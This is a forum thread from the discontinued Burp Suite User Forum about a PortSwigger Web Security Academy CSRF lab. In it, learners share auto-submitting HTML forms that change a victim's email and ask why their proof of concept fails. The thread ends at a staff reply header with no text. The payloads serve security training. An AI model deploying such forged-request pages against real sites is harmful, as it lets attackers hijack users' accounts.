Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Lab: CSRF where token is not tied to user session

Kristoffer | Last updated: Jul 27, 2020 02:42PM UTC

I've been doing this lab, and I've almost made it. However, when making the PoC it wont get resolved. It looks like this: <form method="POST" action="https://acb41f1f1e3c69e3807775f800700074.web-security-academy.net/email/change-email"> <input type="hidden" name="email" value="noen@email.com"> </form> <script> document.forms[0].submit(); </script> I've made sure to use a csrf token that is not used in the session from "incognito" and then copied the url from "repeater". But it wont get resolved. Please give me some help :)

Uthman, PortSwigger Agent | Last updated: Jul 27, 2020 02:47PM UTC

Hi Kristoffer, You will need to include information about the CSRF token within the HTML. You can take a look at this video for a full example: - https://www.youtube.com/watch?v=JKwTX9wjeec

Elliot | Last updated: May 15, 2024 07:08PM UTC

i've been doing this lab too... This is what a did : <html> <body> <h1>Hello World!</h1> <iframe style="display: none" name="csrf-iframe"></iframe> <form method="post" action="https://0a1d004c0417d4e283b7472a00530060.web-security-academy.net/my-account/change-email" id="csrf-form" target="csrf-iframe"> <input type="hidden" name="email" value="test5@test.ca"> <input type="hidden" name="csrf" value="C3BUSogr6GeJhmKkTxoaaXMbCSkGq7cA"> </form> <script>document.getElementById("csrf-form").submit()</script> </body> </html> But, i don't know where is my error ? I use Community Edition. Thank in advance!

Dominyque, PortSwigger Agent | Last updated: May 16, 2024 01:23PM UTC